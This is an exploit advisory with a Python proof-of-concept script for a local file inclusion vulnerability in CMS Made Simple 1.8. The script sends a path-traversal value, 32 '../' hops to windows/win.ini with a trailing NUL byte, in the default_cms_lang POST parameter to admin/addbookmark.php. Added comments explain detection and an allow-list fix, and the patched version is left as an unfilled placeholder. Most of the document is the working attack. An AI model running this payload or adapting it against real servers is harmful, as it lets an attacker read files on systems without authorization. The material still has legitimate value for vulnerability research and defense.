CMS Made Simple version 1.8 local file inclusion exploit.
1a1daed84fb2084c686a6100600ef7227290c8046b0925b543104077b45fb8b5
# ------------------------------------------------------------------------
# Software................CMS Made Simple 1.8
# Vulnerability...........Local File Inclusion
# Download................http://www.cmsmadesimple.org/
# Release Date............7/11/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
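# A local file inclusion vulnerability in CMS Made Simple 1.8 can be
# exploited to include arbitrary local files. The PoC below reaches it through
# the default_cms_lang POST parameter of admin/addbookmark.php.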
#
#
# --PoC--
import httplib, urllib
# Target of the request: a local lab install (the header above lists
# Windows Vista + XAMPP as the test environment).
host = 'localhost'
path = '/cmsms'

# Value sent in the default_cms_lang form field: 32 parent-directory hops,
# a Windows file path, and a trailing NUL byte.
# NOTE(review): the NUL presumably cuts off a suffix the application appends
# before including the file - confirm against the CMSMS source. PHP rejects
# NUL bytes in filesystem paths from 5.3.4 onward, which closes the
# truncation part but not the traversal itself.
lang_value = ('../' * 32) + 'windows/win.ini\x00'

endpoint = path + '/admin/addbookmark.php'
# urlencode() percent-encodes the value, so on the wire the slashes appear as
# %2F and the NUL as %00. Detection rules should match on the decoded value.
form_body = urllib.urlencode({'default_cms_lang': lang_value})
form_headers = {'Content-type': 'application/x-www-form-urlencoded'}

conn = httplib.HTTPConnection(host)
conn.request('POST', endpoint, form_body, form_headers)
resp = conn.getresponse()

# Defender's view: the parameter travels in a POST body, which ordinary access
# logs do not record. Spotting this needs request-body inspection (WAF or
# application logging) for default_cms_lang values containing '../' or a NUL.
# The fix belongs server-side: resolve the parameter against an allow-list of
# installed language identifiers instead of building an include path from it,
# and apply the vendor release that addresses this issue
# (<fixed-version placeholder - not stated on this page>).
print '%s %s' % (resp.status, resp.reason)
# The script only dumps the response body. Whether the included file's
# contents appear in it is not shown on this page.
print resp.read()